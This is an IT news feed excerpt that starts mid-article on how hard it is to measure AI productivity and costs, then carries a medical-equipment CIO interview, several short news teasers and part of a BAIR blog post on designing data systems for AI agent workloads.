<p>Most companies start on a smaller scale, rolling out AI chatbots to employees to help improve productivity. And the pace of adoption here has been staggeringly high, matched only by a lack of ability to measure the productivity gains that are supposed to be achieved.</p>



<p>Having a baseline is key, says Anand Rao, professor of AI at Carnegie Mellon University, but it’s difficult to measure in some cases, and all but impossible in others. Take for example insurance decisions where results can take years to show up. With life insurance, it could be decades, he says. And for some types of decisions, companies don’t have any measurements at all.</p>



<p>“There’s a social stigma to saying that I’m trying to look at your decision-making and how well you’re making the decisions,” he says. “As humans, we don’t like to be measured for our decisions.”</p>



<p>Then, when a decision turns out well in the end, people are happy to take credit. “If the decision goes badly, it’s something outside,” he says.</p>



<p>But even for specific tasks where measurement is possible, companies often don’t put in the work to make the measurements prior to rolling out AI tools. “We didn’t start with a baseline,” says Julie Averill, former EVP and global CIO of fashion retailer Lululemon. Averill is now CEO at Gold Thread, a digital transformation consultancy.</p>



<p>“We started with the assumption that AI was going to help people make better decisions,” she says. “And that sets you up to not being able to measure well.”</p>



<p>There are alternative metrics that a company can look at instead, she adds, like usage rates or user satisfaction. “This is happening, and it’s bringing benefits,” she says, “some of which you can see, and some you can’t. You have to trust the process. It’s just like the cloud. You know it’s the way of the future and you can see the benefits, but it’s hard to get there, and there’s a lot of change required. But the sooner you do that, the sooner you’re in the new way of operating and can really take advantage of it.”</p>



<p>There are other areas where hard metrics are more readily available, like customer service. “These are repeatable tasks, and it’s usually the first place companies automate with AI,” Averill says. “There are very tangible results you can measure, and you can have a very good baseline.”</p>



<p>Lululemon has also been using AI for years for better personalization and recommendations, and that’s also an area that can be quantified. And automation can reduce manual data entry, reducing error rates. AI can also be used to help with compliance monitoring, fraud detection, and predictive maintenance for equipment, which are all use cases that can be quantified.</p>



<p>But employee productivity in general? That’s a tough one to measure, and not just for Lululemon. One obvious way might be to look at layoffs in professions exposed to AI. After all, the headlines are everywhere. But in <a href="https://www.anthropic.com/research/labor-market-impacts" rel="nofollow">a report released in March</a>, Anthropic found no signs of an increase in unemployment in highly exposed professions, those in which people are most likely to be laid off due to AI.</p>



<p>In early 2025, research firm METR attempted to quantify developer productivity by comparing how fast experienced developers were able to achieve tasks with AI and without. The result? Developers said they were expecting AI to speed them up by 24%, and estimated that AI had actually sped them up by 20%. But the data showed an altogether different story. Their use of AI actually slowed them down by 19%.</p>



<p>Of course, AI tools are getting better. METR attempted to do a follow-up study, again tracking tasks done with and without AI, but they couldn’t find enough developers willing to go back to the no-AI approach, even though the researchers were paying them to participate in the study.</p>



<p>There are anecdotal reports of companies where one engineer does the work of a hundred by using AI. Or that time the entire half-million-line Claude Code codebase was accidentally leaked and Korean developer Sigrid Jin created a clean-room rebuild in two hours, which he then pushed to GitHub, where it became the fastest project in history to hit 100,000 stars.</p>



<p>But as with anything else having to do with AI, the real picture is more complicated. With software development in particular, typing the code is actually just a fraction of what’s involved in developing software.</p>



<p>Research firm DX recently analyzed key engineering metrics from 400 companies, and in a recent report found that AI usage increased by 65% since November 2024, but AI-related productivity was just under 10%.</p>



<h2 class="wp-block-heading">Hidden costs</h2>



<p>Just as it’s difficult to measure the productivity benefits of AI, it can also be tricky to measure the costs. When a company first starts using AI, costs might be relatively simple to estimate. What’s the total monthly subscription charges for the AI chatbots that employees are using? What’s the cost of training or fine-tuning a custom model? But when you move on to more complex use cases, the calculations get more difficult, says Averill.</p>



<p>“Now there are all the systems around the AI,” she says. “Those are harder to measure, but the impact is bigger.”</p>



<p>For example, if AI is embedded into business processes using RAG, there’s the ongoing expense of the API calls, but also the changes that need to be made to other systems, she says. And it just keeps getting more complicated every day.</p>



<p>“We haven’t taken a very concerted effort to putting telemetry and instrumentation in place,” says Swaminathan Chandrasekaran, global head of AI and data labs at KPMG. He says that getting a comprehensive picture of the total costs of AI in an enterprise is like predicting the weather.</p>



<p>“The reason we have a pretty awesome weather prediction system in this country is because we have tens of thousands of weather stations that aggregate data,” he says. “Without that, we wouldn’t know the weather.”</p>



<p>Companies need to set up instrumentation to measure all the aspects of AI-related consumption, he says, starting with the number of tokens used, who’s using them, and how it correlates to work output.</p>



<p>“That measurement is fundamentally lacking,” he says.</p>



<p>At least when humans are using AI chatbots, there’s a limit to how many questions they’re physically able to ask, combined with predictable subscription costs. And when business processes are AI-enabled via RAG, the API calls to LLMs are being made by predictable, traditionally-scripted business systems.</p>



<p>But now, agentic AI is making everything worse because the agents can act unpredictably, and the number of API calls can quickly spiral out of control. In a report by the <a href="https://www.bcg.com/publications/2026/how-leaders-build-an-ai-first-cost-advantage" rel="nofollow">Boston Consulting Group</a>, two-thirds of companies are reporting uncontrollable AI scaling expenses.</p>



<p>Another cost some companies might not anticipate well, or not track because it’s part of a different budget, is data-related cost. Whether preparing data for training or fine-tuning, using RAG embeddings, or setting up direct MCP access via agents, these costs can quickly add up when AI comes into the picture.</p>



<p>“Egress fees are one of the big ones,” says Tom Coughlin, IEEE fellow and president of consulting firm Coughlin Associates. “If you have to bring data out of the cloud, those egress fees could be considerable.”</p>



<p>Then there are all the <a href="https://www.cio.com/article/4152626/organizations-often-dont-measure-the-cost-of-it-inefficiency-but-it-can-be-huge.html?utm=hybrid_search">human costs of deploying AI</a>, he adds.</p>



<p>“There’ll be a lot of value that people get out of AI in the long run, but they need to know how to use it properly,” he says. “If they don’t have those skills, you’ll be at a disadvantage.”</p>



<h2 class="wp-block-heading">Solutions and mixed messages</h2>



<p>Then there’s fixing problems. A majority of companies have had at least one AI-related incident in the last 18 months, with most resulting in financial loss, some over $500,000. Then there’s the AI that’s being embedded in everything.</p>



<p>“We know our direct costs,” says Andrew Johnson, CIO at Brownstein Hyatt Farber Schreck, a leading national law firm. “But where it becomes more difficult to measure is with platforms we already have in place, and SaaS applications that didn’t have AI capabilities,” he says. “They’re asking for extraordinary increases and attribute them to new capabilities due to AI. How much should be ascribed to AI? That’s a little wishy-washy.”</p>



<p>Even when AI saves money, there are often extra costs associated with that. For example, the firm was spending about $70,000 a year on a contract management platform. Building their own version with AI took about $40,000 in labor costs and another $3,000 a year for hosting. Ongoing maintenance will be minor for that particular application, he adds, totaling another couple of thousand a year.</p>



<p>But there are also other indirect costs that come with running your own applications, including security audits, vulnerability assessments, penetration tests, and code review.</p>



<p>“The more complex and riskier the platform, the less appetite there is for trying to create an in-house solution,” he says.</p>



<p>Still, the software development team is now dramatically more productive as a result of AI, with four or five developers able to do the work of 20 or 30.</p>



<p>But the productivity improvements don’t translate to labor savings, since there’s plenty of new work for the developers to do. “We have an enormous backlog of opportunities to develop solutions,” he says.</p>



<p>The tendency of work to expand to fill the time available isn’t just true for software development, says Carnegie Mellon’s Rao.</p>



<p>Say for example, AI is expected to lead to a 20% improvement in productivity, he says. “There were a hundred people doing it, and now we only need 80.” But at the end of the year, headcount hasn’t changed. “The tasks they were doing, there’s improvement,” he adds “But humans will add tasks to supplement or complement that 20%. It’s not that they’re going home an hour early, but they’re finding other value-generating activities.”</p>



<p>In fact, in some cases, increased productivity at a company can actually hurt the bottom line. Lawyers, for example, bill by the hour.</p>



<p>“Efficiency runs counter to our traditional ways of making money,” says Brownstein’s Johnson. “We have to think past that. It’s not detrimental to our long-term interest, but it’s a challenge in the short term. If we don’t do this, though, it’s likely we won’t be competitive in the mid- to long-term.”</p>



<p>So if a new AI tool helps an attorney with due diligence, there’s no straight line between the investment in that tool and increased revenues.</p>



<p>“It’s a given that it’s directionally right,” Johnson says. “But we can’t say it’s going to lead to a particular return.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The tech behind patient-first transformation at USME]]></title>
<description><![CDATA[As a medical equipment rental company that rents, sells, and manages movable medical devices, including infusion pumps, monitors, ventilators, and incubators, USME’s mission is simple in definition, but highly sophisticated in practice.



“Our job is to deliver the right equipment to the right p...]]></description>
<link>https://tsecurity.de/de/3653925/it-security-nachrichten/the-tech-behind-patient-first-transformation-at-usme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653925/it-security-nachrichten/the-tech-behind-patient-first-transformation-at-usme/</guid>
<pubDate>Wed, 08 Jul 2026 12:08:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As a medical equipment rental company that rents, sells, and manages movable medical devices, including infusion pumps, monitors, ventilators, and incubators, USME’s mission is simple in definition, but highly sophisticated in practice.</p>



<p>“Our job is to deliver the right equipment to the right place at the right time,” says CIO Antonio Marin. “When you look at the community we serve, the last part of the supply chain is a patient in need. So we need to make sure all our technology, processes, and everything we do has a patient in mind. After all, they call us because they need lifesaving equipment, not because it’s a beautiful day.”</p>



<p>A particularly vital application of technology for Marin and his team has been directed to revamping the company’s inventory and equipment management, and field services.</p>



<p>“We did a lot of automation behind the scenes,” he says. “Knowing your inventory, knowing what parts you need to fix, and tracking the lifecycles of inventory is all now very automated, well managed, and fully visible across the organization. It’s about humans making critical decisions, not doing paperwork.”</p>



<p>But with that added efficiency comes some risk. And when lives are on the line in a highly regulated sector, vulnerabilities can surface with more tech that’s introduced. So some innovations can be more detrimental to the operations of a company or a hospital.</p>



<p>“We use encryption and different systems to overlay protection when it comes to personal identification data,” Marin says. “When you look at the cybersecurity chain, humans are still the weakest link.”</p>



<p>When talking about security, particular care needs to be taken in terms of knowing exactly where the team and equipment are at all times, and tracking performance across company and hospital staff, and hospital partners.</p>



<p>“As a person in IT and as an employee of the company, it’s very rewarding when we’re able to deliver lifesaving equipment so hospitals can succeed in helping patients,” he says.</p>



<p>Marin also discusses the importance tech and human synergy, prioritizing education in regard to cybersecurity, and the power of automating processes. Watch the full video below for more insights, and be sure to subscribe to the monthly Center Stage newsletter by clicking <a href="https://www.cio.com/newsletters/signup/">here</a>.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>On setting the right foundations:</strong> We’re in the middle of a major transformation. The company started with a homegrown system with phenomenal software, but as we’ve grown, it becomes more complicated to keep up with the rate of progress. So we decided to move to a SaaS platform and we have the first part of the project already complete. It’s been very successful and now we’re finishing the second part.</p>



<p>We can look not only at our business processes and refine them, but we think about embedding AI for faster and more accurate results. You have to have sound data and processes with AI. In one of my previous companies we used AI at the beginning when it was a buzzword and not really there. I learned a very important lesson then. You can fit the model, train it, and ask a specific question, but an unexpected answer might come back. So we went back to the old ways to analyze data and realized that the answer was right but the question was wrong.</p>



<p>I learned you have to be open to evaluate answers and understand where the real data is coming from, and the real sentiment on the data — the context of the information you’re working with.</p>



<p><strong>On human involvement: </strong>There always has to be a human in the loop. That doesn’t mean we can’t speed the process for that human. There’s incredible things we’re doing today where an AI doesn’t have to be just gen AI. There are so many variances of AI and versions of what you can do with it. For instance, we’ve been able to automate the ordering process from a single click at a hospital nurse station to our branch operations where we get all the information we need to deliver lifesaving equipment.</p>



<p>In one hospital in particular, we delivered a full bed and mattress in less than 15 minutes. To put that in context, industry standards are normally between 12 and 24 hours. So in certain cases when we’re in proximity, we can be extremely fast because there’s no human interaction.</p>



<p><strong>On AI and model training: </strong>We created a system called GoUSME Connect. It’s a combination of RPA, AI, and machine learning that can read a request generated by an electronic medical record system. So we’re agnostic of any EMR, and it reads information. And through machine learning, it reads the pattern of the request that transfers into an order, which ends up in one of our delivery locations.</p>



<p>That’s one part of how we can deliver equipment. We’re working hard to continue on predictive analytics and teaching the models because as a rental company, we have so much information about the true performance of medical equipment. Our goal in the next few months is to be able to predict equipment failures based on historical data.That’s the thing about medical equipment. It’s just a new computer. They have to go through preventive maintenance once a year, and every time they come back from a hospital, they go through review process.</p>



<p>So we always make sure equipment is patient ready. As we all know, though, equipment can fail. But if we can gather all the equipment we’ve rented in the last 23 years and start feeding those models with all that data, then we can be more predictive.</p>



<p><strong>On logistics: </strong>One of the first things is to know your inventory, what equipment you have. And in the medical equipment rental business, it could be very seasonal. You have times where you have respiratory issues, then you get neonatal seasons. So what it allows us to do is look at our past rentals, and our inventory, and then start helping the equipment management team plan their production for the next month, week, or the next day. That’s a huge change in how we used to do things to what we can do now.</p>



<p>From the time of getting equipment prepared to being patient ready in the old days could be like getting a call, having a technician look for the piece of equipment, and then do all the necessary paperwork and testing. Every interaction was very manual. Now we know where it’s coming from and we prepare it. If parts for a piece of equipment are needed, the parts requisition is already requested. We know where those parts are in the country, and we know we need to ship them somewhere else. So the days of doing all those things that waste time are gone.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NVIDIA’s Cosmos-Framework Tutorial: Designing a Colab-Friendly Miniature of Cosmos 3 World Models with Omnimodal Mixture-of-Transformers]]></title>
<description><![CDATA[In this tutorial, we explore NVIDIA's cosmos-framework from a practical Colab angle while staying honest about the hardware needed for real Cosmos 3 checkpoints. We probe the runtime, then use the framework's real structure, CLI surface, and input schema as a foundation. We build and train a comp...]]></description>
<link>https://tsecurity.de/de/3653519/ai-nachrichten/nvidias-cosmos-framework-tutorial-designing-a-colab-friendly-miniature-of-cosmos-3-world-models-with-omnimodal-mixture-of-transformers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653519/ai-nachrichten/nvidias-cosmos-framework-tutorial-designing-a-colab-friendly-miniature-of-cosmos-3-world-models-with-omnimodal-mixture-of-transformers/</guid>
<pubDate>Wed, 08 Jul 2026 09:18:52 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this tutorial, we explore NVIDIA's cosmos-framework from a practical Colab angle while staying honest about the hardware needed for real Cosmos 3 checkpoints. We probe the runtime, then use the framework's real structure, CLI surface, and input schema as a foundation. We build and train a compact omnimodal Mixture-of-Transformers that shares cross-modal attention while routing each modality to its own expert. Using synthetic physical-world data and an autoregressive rollout, we show how the model predicts future latent states across text, vision, and action.</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/08/nvidias-cosmos-framework-tutorial-designing-a-colab-friendly-miniature-of-cosmos-3-world-models-with-omnimodal-mixture-of-transformers/">NVIDIA’s Cosmos-Framework Tutorial: Designing a Colab-Friendly Miniature of Cosmos 3 World Models with Omnimodal Mixture-of-Transformers</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsungs: In einem Jahr mehr Gewinn als in 40 Jahren zusammen]]></title>
<description><![CDATA[Samsung Electronics hat dank der anhaltend hohen Nachfrage nach Speicherchips ein Rekordergebnis erzielt und ist im zweiten Quartal 2026 gemessen am operativen Gewinn zum profitabelsten Technologieunternehmen der Welt aufgestiegen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3653356/it-security-nachrichten/samsungs-in-einem-jahr-mehr-gewinn-als-in-40-jahren-zusammen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653356/it-security-nachrichten/samsungs-in-einem-jahr-mehr-gewinn-als-in-40-jahren-zusammen/</guid>
<pubDate>Wed, 08 Jul 2026 07:53:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159836.html"><img hspace="5" border="0" align="left" alt="Ki, Künstliche Intelligenz, Technologie, Roboter, Geld, Sci-Fi, Automatisierung, Dollar, Fintech, Futurismus, Digitale Währung, Finanztechnologie, Dollarscheine, KI-Finanzen, Roboter-Geld, Zukunft der Finanzen, Roboterökonomie" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/76541.jpg"></a>
			<a href="https://winfuture.de/special/samsung-electronics/" title="Samsung Electronics Special">Samsung</a> Electronics hat dank der anhaltend hohen Nachfrage nach Speicherchips ein Rekordergebnis erzielt und ist im zweiten Quartal 2026 gemessen am operativen Gewinn zum profitabelsten Technologieunternehmen der Welt aufgestiegen.			(<a href="https://winfuture.de/news,159836.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix to Cash-Out: Anatomy of a Mexican Banking-Fraud Toolkit]]></title>
<description><![CDATA[Elastic Security Labs tracks REF6045, an active operator-assisted banking fraud operation targeting customers of Mexican banks, fintech, payment processors, and cryptocurrency exchanges.]]></description>
<link>https://tsecurity.de/de/3652816/it-security-nachrichten/clickfix-to-cash-out-anatomy-of-a-mexican-banking-fraud-toolkit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652816/it-security-nachrichten/clickfix-to-cash-out-anatomy-of-a-mexican-banking-fraud-toolkit/</guid>
<pubDate>Tue, 07 Jul 2026 23:53:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elastic Security Labs tracks REF6045, an active operator-assisted banking fraud operation targeting customers of Mexican banks, fintech, payment processors, and cryptocurrency exchanges.]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp Appoints CRED Founder Kunal Shah as New Global Head]]></title>
<description><![CDATA[  In a landmark move for the global tech industry, WhatsApp announced in June 2026 that its long-serving head Will Cathcart will step down, with Indian fintech founder Kunal Shah appointed as his successor. This transition marks the first time…
Read more →
The post WhatsApp Appoints CRED Founder ...]]></description>
<link>https://tsecurity.de/de/3652393/it-security-nachrichten/whatsapp-appoints-cred-founder-kunal-shah-as-new-global-head/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652393/it-security-nachrichten/whatsapp-appoints-cred-founder-kunal-shah-as-new-global-head/</guid>
<pubDate>Tue, 07 Jul 2026 19:53:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  In a landmark move for the global tech industry, WhatsApp announced in June 2026 that its long-serving head Will Cathcart will step down, with Indian fintech founder Kunal Shah appointed as his successor. This transition marks the first time…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/whatsapp-appoints-cred-founder-kunal-shah-as-new-global-head/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/whatsapp-appoints-cred-founder-kunal-shah-as-new-global-head/">WhatsApp Appoints CRED Founder Kunal Shah as New Global Head</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Intelligence is Free, Now What?  Data Systems for, of, and by Agents]]></title>
<description><![CDATA[... government of the people, by the people, for the people ...
    — Abraham Lincoln, Gettysburg Address (1863)


The cost of AI is dropping rapidly. GPT-4-class capabilities cost roughly $30 per million tokens in early 2023; today the same runs under $1, and some providers are pushing costs bel...]]></description>
<link>https://tsecurity.de/de/3652331/ai-nachrichten/intelligence-is-free-now-what-data-systems-for-of-and-by-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652331/ai-nachrichten/intelligence-is-free-now-what-data-systems-for-of-and-by-agents/</guid>
<pubDate>Tue, 07 Jul 2026 19:19:05 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- twitter -->












<p>
<i>... government of the people, by the people, for the people ...</i><br>
    — Abraham Lincoln, Gettysburg Address (1863)
</p>

<p>The cost of AI is dropping rapidly. GPT-4-class capabilities cost roughly <span class="tex2jax_ignore">$30</span> per million tokens in early 2023; today the same runs under <span class="tex2jax_ignore">$1</span>, and <a href="https://zuplo.com/learning-center/the-10x-cheaper-ai-era-api-pricing-strategy-obsolete">some providers are pushing costs below <span class="tex2jax_ignore">$0.10</span></a>. Across benchmarks, <a href="https://epochai.org/data-insights/llm-inference-price-trends">inference prices have fallen between 9x and 900x per year</a>, with a median decline near 50x. Even <a href="https://tokenmix.ai/blog/ai-pricing-trends-history">frontier models are getting dramatically cheaper</a> each generation, with open-source models following closely behind. And crucially, even if “Nobel-Prize-winning genius-level” intelligence isn’t here yet, the intelligence that suffices for the vast majority of knowledge work is here today, and getting cheaper by the month. <strong>At this rate, we are soon entering the era of virtually free intelligence</strong>—the kind that is more than enough for everyday knowledge work.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/image6.png" alt="A cartoon database character and an AI robot agent holding hands" width="450">
</p>

<!--more-->

<p>
Disclosure: This post is a perspective led by <a href="https://people.eecs.berkeley.edu/~adityagp/">Aditya G. Parameswaran</a>—an Associate Professor of EECS and co-director of the EPIC Data Lab at UC Berkeley—together with his collaborators. It is part landscape survey and part perspective, and several of the research directions discussed below (including agentic speculation, structured memory, and synthesizing custom data systems from scratch) draw on the authors' own ongoing work.
</p>

<p>So, what does this new era of near-free intelligence mean for data systems? We believe three new challenges—and opportunities—stem from near-zero inference costs:</p>

<p><strong>Data Systems <em>For</em> Agents.</strong> Agents will soon become the dominant workload for data systems—with swarms of agents spun up in response to each end-user request. Given differences in characteristics between agents and humans—or applications acting on their behalf—<em>how should we redesign data systems for such agentic users?</em></p>

<p><strong>Data Systems <em>Of</em> Agents.</strong> As agents start taking on the bulk of knowledge work, a new substrate is needed for thousands of agents to manage state over long-running tasks, coordinate and reach consensus, and deal with failures. <em>What do data systems that reliably and efficiently run and manage agent swarms look like?</em></p>

<p><strong>Data Systems <em>By</em> Agents.</strong> Agents are rapidly becoming capable of synthesizing entire data systems in one go—meaning we can rebuild custom systems for each new workload. Verifying that such systems match intended behavior is a challenge. <em>What does it take to let agents synthesize data systems we can actually trust?</em></p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/for-of-by-agents.png" alt="A database character and a robot agent holding up a triangle labeled 'of', 'for', and 'by'" width="500"><br>
<i>
Data Systems For, Of, and By Agents
</i>
</p>

<p>Next, we will discuss each in more detail, followed by discussing the intertwined future of data systems and agents, especially as the three challenges intersect.</p>

<h2>Data Systems For Agents</h2>

<p>An agent querying a database doesn’t behave like a person or a BI tool. It performs what we call <a href="https://arxiv.org/abs/2509.00997"><em>agentic speculation</em></a>: a high-volume, heterogeneous stream of work spanning schema introspection, columnar exploration, partial and then full query formulation. With multiple agents each exploring portions of the hypothesis space, each user request could amount to 1000s of individual SQL queries. Now, users can issue ‘high-level’ data tasks, e.g., root-cause analysis—e.g., ‘why did coffee sales in Berkeley drop this year’—or exploratory cohort analysis—e.g., ‘which user segments are most likely to churn next quarter’—each involving a combinatorial space of potential joins, aggregations, and filter combinations.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/image5.png" alt="An agent sending many SELECT SQL queries to a database and receiving results back" width="600"><br>
<i>
Data Systems Redesigned to More Effectively Support Agentic Speculation
</i>
</p>

<p>The requests from these agents have various opportunities for optimization. For instance, on a text-to-SQL benchmark with multiple agents attempting each task, only 10-20% of the sub-plans are distinct. Thus, 80-90% of sub-queries perform duplicate work. The same experiments show task success rates significantly increasing with more agentic attempts—so the redundancy is actually helpful. But from the data system perspective it’s wasted work.</p>

<p>An agent-first data system can exploit such properties to help agents make progress faster. It can reuse results across overlapping sub-plans, drawing on ideas from decades-old literature on <a href="https://dl.acm.org/doi/10.1145/42201.42203">multi-query optimization</a> and <a href="https://www.vldb.org/conf/2007/papers/research/p723-zukowski.pdf">shared scans</a>. Or the data system can try to <em>satisfice</em>, returning approximate answers that are good enough for agents to make progress, leveraging work from <a href="https://dl.acm.org/doi/10.1145/253260.253291">the</a> <a href="https://dl.acm.org/doi/10.1145/2465351.2465355">AQP</a> <a href="https://dl.acm.org/doi/10.1561/1900000004">literature</a>—or streaming the results of the final or intermediate operators to help agents decide if seeing the rest is necessary or helpful.</p>

<p>Another opportunity here is to rethink the query interface entirely: instead of agents issuing a single SQL query at a time, they could instead issue a batch of queries, each with its own approximation requirements. Since enumerating an exponential search space (as in the root cause or cohort analysis examples above) isn’t a good use of agentic reasoning ability, perhaps data systems should support higher-level primitives rather than requiring agents to list each SQL query explicitly. One idea here is to draw on <a href="https://docs.getdbt.com/docs/build/jinja-macros">DBT-style Jinja macros</a> to provide looping-based primitives for agents to interact with data systems.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/image2.png" alt="A swarm of AI agents working at laptops" width="450"><br>
<i>
A Caffeinated Army of Agents Ready to Tirelessly Complete Your Data Tasks
</i>
</p>

<p>A final opportunity here is to stop thinking of data systems as passive executors of queries; data systems could be <a href="https://arxiv.org/abs/2502.13016">proactive</a>, as they possess more grounding in data and system characteristics that agents may lack a priori—they could steer agents in different directions, provide results for related queries, and also provide performance-level feedback (e.g., instead of executing an expensive query, the system could first provide the agent a latency estimate). The reason we can do this now as opposed to the past is that an agent can accept any form of textual feedback and isn’t expecting a strict SQL query result. In fact, the data system could also prepare both materialized and virtual views for an agent in advance, provided to the agent as part of context, as this may be cheaper or more effective than having an agent author or use them.</p>

<h2>Data Systems Of Agents</h2>

<p>Previously, we focused on how agents interact with data systems. Now, we consider everything else agents need to keep working: where they live, how they remember, how they coordinate with each other, and how they deal with failures of each other. This <em>agentic substrate</em> is separate from the inference stack powering raw intelligence. However, the inference stack itself is being abstracted away through APIs (e.g., from OpenAI or Anthropic), or, for open-weight models, through <a href="https://github.com/vllm-project/vllm">serving</a> <a href="https://github.com/sgl-project/sglang">frameworks</a> that hide low-level details. So far, the agentic substrate has been managed through harnesses like <a href="https://www.anthropic.com/claude-code">Claude Code</a> and <a href="https://github.com/openai/codex">Codex</a>, coupled with various mechanisms to <a href="https://mem0.ai/">store</a> and <a href="https://www.letta.com/">retrieve</a> memory.</p>

<p>First, on the memory front, the current wisdom is that <a href="https://www.amplifypartners.com/blog-posts/file-systems-for-agents">files</a> <a href="https://lsvp.com/stories/filesystemsforagents/">are all you need</a>; agents write to unstructured markdown (MD) files, which can then be searched using grep, or via embedding-based retrieval. In fact, many argue that the solution to continual learning is having agents consume a lot (e.g., an entire codebase, slack, company wikis, …) and then write their learnings into MD files, which are then retrieved selectively on demand. Indeed, file systems, bash scripting, and MD files are and will still be important for agents. However, at scale, when agents are doing the vast majority of knowledge work, this approach will no longer be effective.</p>

<p>Given limited context windows, retrieving all MD file fragments that may be relevant and stuffing it into the context will break down at some point. Even if context windows continue to grow, there are latency benefits to not put all information into context — and in many cases, e.g., when knowledge work involves interacting with large databases or code bases, it will be infeasible to serialize all relevant data into context.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/substrate-for-agent-swarms.png" alt="A swarm of robot agents holding hands, each drawing state from a single large shared database platform below them" width="500"><br>
<i>
Data Systems As A Substrate for Multi-Agent Swarms
</i>
</p>

<p>One could use a <a href="https://mem0.ai/">knowledge</a> <a href="https://www.getzep.com/">graph</a> <a href="https://langchain-ai.github.io/langmem/">representation</a>, but knowledge graphs suffer from the same limitations as unstructured MD-based memory due to their lack of structured search. What one needs is to be able to retrieve only memory that is pertinent to the task, across multiple attributes (or facets) of interest. For example, an agent debugging a flaky test should be able to pull only the memories tagged with the relevant module, language, framework, and failure mode—rather retrieving based on keywords or embedding similarity. A separate issue is what to actually retrieve; raw agent traces with mistakes are not very useful as they will induce agents to repeat the same mistake—instead, we want the retrieved memory to be corrective.</p>

<p>We recently explored a related notion of <a href="https://arxiv.org/abs/2602.13521"><em>structured memory</em></a>, where we organize memory across various attributes, each of which could be set as <code class="language-plaintext highlighter-rouge">*</code> to indicate universal applicability, or set as a list of values to be matched. For a data agent, the dimensions could include the columns and tables, type of operation, and finally, open-ended natural-language corrective instructions. So, we could include memory that only applies to a given type of operation (e.g., ‘when performing date-time operations, use fiscal year as opposed to calendar year conventions’), or a given table (e.g., ‘column product_cleaned is preferred over column product when querying on product name’). One open question is defining an <em>application-specific structured memory</em>—or what others have called <a href="https://www.linkedin.com/feed/update/urn:li:activity:7467499112523804672/">world models for memory</a>. We believe this is akin to defining a schema for each application—and perhaps agents themselves can help us define and refine it over time.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/structured-knowledge.png" alt="Diagram showing corrective knowledge stored with structured attributes (SQL keywords, tables, columns, data type) and retrieved by matching the features of a new agent query" width="100%"><br>
<i>
One Possible Way To Store and Retrieve Structured Knowledge <a href="https://arxiv.org/abs/2602.13521">[From Here]</a>
</i>
</p>

<p>Structured memory will be useful also for <a href="https://github.com/skydiscover-ai/skydiscover">evolutionary</a> <a href="https://arxiv.org/abs/2506.13131">frameworks</a> to effectively manage search spaces. Indeed, storing, structuring, and mining large volumes of single and <a href="https://sky.cs.berkeley.edu/project/mast/">multi-agent traces</a> can help future agents become much more efficient—potentially enabling effective recursive self-improvement through structured memory-based mechanisms.</p>

<p>Another challenge is to support concurrent edits to shared memory, and concurrent edits in general, when there are many agents performing transformations. While there have been some useful attempts at <a href="https://dl.acm.org/doi/10.1145/3702634.3702955">supporting</a> <a href="https://neon.com/docs/get-started/why-neon">multiversioning</a> and <a href="https://docs.turso.tech/agentfs/introduction">copy-on-write semantics</a>, it isn’t clear that such techniques will suffice when thousands of agents are attempting to edit shared state at the same time. For instance, when agents are trying various potential transactions in response to a user request, the effects of the vast majority of these transactions need to be rolled back—with only the one ‘correct’ transaction’s result persisting. Work on supporting exactly-once semantics is relevant here, as are underlying techniques based on CRDTs and operational transformation. For updates to fuzzy mechanisms such as memory, we may be able to sacrifice on consistency for perfect correctness in the interest of latency. While agents can reason about semantics to compensate or roll back their actions to eventually finalize most tasks, the primary challenge lies in the degree to which they step on each other’s toes during the process. An important failure mode to be avoided is a form of “livelock,” where incessant compensating actions prevent any meaningful progress.</p>

